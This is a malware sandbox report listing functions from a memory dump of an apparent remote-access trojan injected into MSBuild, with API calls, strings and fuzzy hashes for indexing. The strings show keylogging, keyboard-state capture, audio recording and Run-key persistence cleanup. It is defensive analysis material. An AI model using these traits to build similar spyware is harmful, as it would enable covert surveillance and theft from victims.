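Pasting a whole function listing (with the surrounding indentation left in place) into parse_records gives one dict per function; the API String ID and the two fuzzy hashes are the fields worth indexing, since they stay stable across builds of the same family more often than the address-bound ref values do.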
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                        • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                        • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                        • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                        • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                        • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                        • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                          • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                          • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 737400349-0
                                                                                                                        • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                        • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                        • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                        • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                        • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                        • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                        • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                        • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3919263394-0
                                                                                                                        • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                        • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                        • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                        • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                        APIs
                                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                        • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                        • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4116985748-0
                                                                                                                        • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                        • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                        • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                        • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleOpenProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 39102293-0
                                                                                                                        • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                        • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                        • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                        • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID: $fD
                                                                                                                        • API String ID: 1807457897-3092946448
                                                                                                                        • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                        • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                        • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                        • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                        APIs
                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 0-711371036
                                                                                                                        • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                        • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                        • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                        • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                        Strings
                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                        • API String ID: 481472006-1507639952
                                                                                                                        • Opcode ID: cc2e8fdc496267155201b16627e0203c98a38a6ed5fb5594af8cf6ec90a1053f
                                                                                                                        • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                        • Opcode Fuzzy Hash: cc2e8fdc496267155201b16627e0203c98a38a6ed5fb5594af8cf6ec90a1053f
                                                                                                                        • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                        • API String ID: 481472006-2430845779
                                                                                                                        • Opcode ID: d635f5de0eb30f12a53b303b4771e55d0759891efdf147d162576b96ad6faa0a
                                                                                                                        • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                        • Opcode Fuzzy Hash: d635f5de0eb30f12a53b303b4771e55d0759891efdf147d162576b96ad6faa0a
                                                                                                                        • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                        APIs
                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExistsFilePath
                                                                                                                        • String ID: alarm.wav$xIG
                                                                                                                        • API String ID: 1174141254-4080756945
                                                                                                                        • Opcode ID: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                                        • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                        • Opcode Fuzzy Hash: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                                        • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                        • String ID: Online Keylogger Stopped
                                                                                                                        • API String ID: 1623830855-1496645233
                                                                                                                        • Opcode ID: 02e0c4701129a9c42addc2d2970a81326eabfec1a0363ad7f570d4515b217cc8
                                                                                                                        • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                        • Opcode Fuzzy Hash: 02e0c4701129a9c42addc2d2970a81326eabfec1a0363ad7f570d4515b217cc8
                                                                                                                        • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                        APIs
                                                                                                                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                                                        • String ID: T=G
                                                                                                                        • API String ID: 2315374483-379896819
                                                                                                                        • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                        • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                        • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                        • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                        APIs
                                                                                                                        • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocaleValid
                                                                                                                        • String ID: IsValidLocaleName$j=D
                                                                                                                        • API String ID: 1901932003-3128777819
                                                                                                                        • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                        • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                        • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                        • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: T=G$T=G
                                                                                                                        • API String ID: 3519838083-3732185208
                                                                                                                        • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                        • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                        • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                        • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                        APIs
                                                                                                                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                          • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                        • String ID: [AltL]$[AltR]
                                                                                                                        • API String ID: 2738857842-2658077756
                                                                                                                        • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                        • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                        • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                        • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00448825
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast_free
                                                                                                                        • String ID: `@$`@
                                                                                                                        • API String ID: 1353095263-20545824
                                                                                                                        • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                        • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                        • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                        • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                        APIs
                                                                                                                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: State
                                                                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                                                                        • API String ID: 1649606143-2446555240
                                                                                                                        • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                        • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                        • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                        • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteOpenValue
                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                        • API String ID: 2654517830-1051519024
                                                                                                                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteDirectoryFileRemove
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 3325800564-4028850238
                                                                                                                        • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                        • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
